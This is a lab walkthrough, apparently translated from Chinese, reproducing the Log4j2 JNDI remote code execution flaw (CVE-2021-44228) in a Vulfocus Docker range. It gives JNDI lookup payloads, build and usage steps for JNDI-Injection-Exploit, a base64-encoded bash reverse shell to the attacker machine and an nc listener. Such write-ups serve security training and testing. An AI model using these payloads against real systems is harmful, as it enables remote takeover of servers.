Apache Log4j2 RCE vulnerability reappears

Apache Log4j2 RCE vulnerability reappears

1. Vulnerability introduction

Apache Log4j2 is a Java logging component. In certain versions, the lookup function is enabled, resulting in a remote code execution vulnerability.

Affected versions: Apache Log4j 2.x<=2.15.0.rc1

Vulnerability number: CVE-2021-44228

2. Vulnerability environment construction

Topic: Ubuntu ip: 192.168.241.129

Attack machine : kail ip: 192.168.241.128

Since my Ubuntu virtual machine has already been set up with docker, I can directly use the following command to download the vulnerability image.

sudo docker pull vulfocus/log4j2-rce-2021-12-09:latest

Pull the local environment and run it, and start the local command:

sudo docker run -itd -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

If you do not have docker installed, you can access Vulfocus and use the shooting range environment:

https://github.com/fofapro/vulfocus

After setting up, access the virtual machine IP and port:

http://192.168.241.129:8080

3. Vulnerability recurrence

1. Perform DNSLog verification

Via DNSLog Platform

https://dig.pm/

Obtain the subdomain name and construct the payload:

${jndi:ldap://5097bd9c.dns.1433.eu.org}

The browser clicks ??? and uses Burpsuite to capture the packet and replace the payload parameters. At this time, sending the packet will cause a server 400 error, and the pyload needs to be URL encoded.

Successfully received resolution records on the DNSLog website

2.JNDI injection rebound shell

Exploiting the vulnerability using JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

https://github.com/welk1n/JNDI-Injection-Exploit

Tool usage:

git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
cd JNDI-Injection-Exploit
mvn clean package -DskipTests

Use the mvn command to generate JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar. You need to confirm the maven installation before using the mvn command.

Use command

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

Rebound shell command

bash -i >& /dev/tcp/ip/port 0>&1    //需要base64加密

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.241.128

You can see that 5 links are generated

rmi://192.168.241.128:1099/zvrfsf
rmi://192.168.241.128:1099/xwa9m4
ldap://192.168.241.128:1389/xwa9m4
rmi://192.168.241.128:1099/e1twtt
ldap://192.168.241.128:1389/e1twtt

At this time, open another terminal and open nc to monitor:

nc -lvnp 4444 	//kail
nc64.exe -lvnp 4444//windows下用cmd

At this time, the payload is forged, url is encoded, and bp is sent.

${jndi:rmi://192.168.241.128:1099/zvrfsf}}	//5个链接认选一个

At this time, the following log information appears on the command line, indicating that the execution has been successful.

At this time nc has also rebounded the shell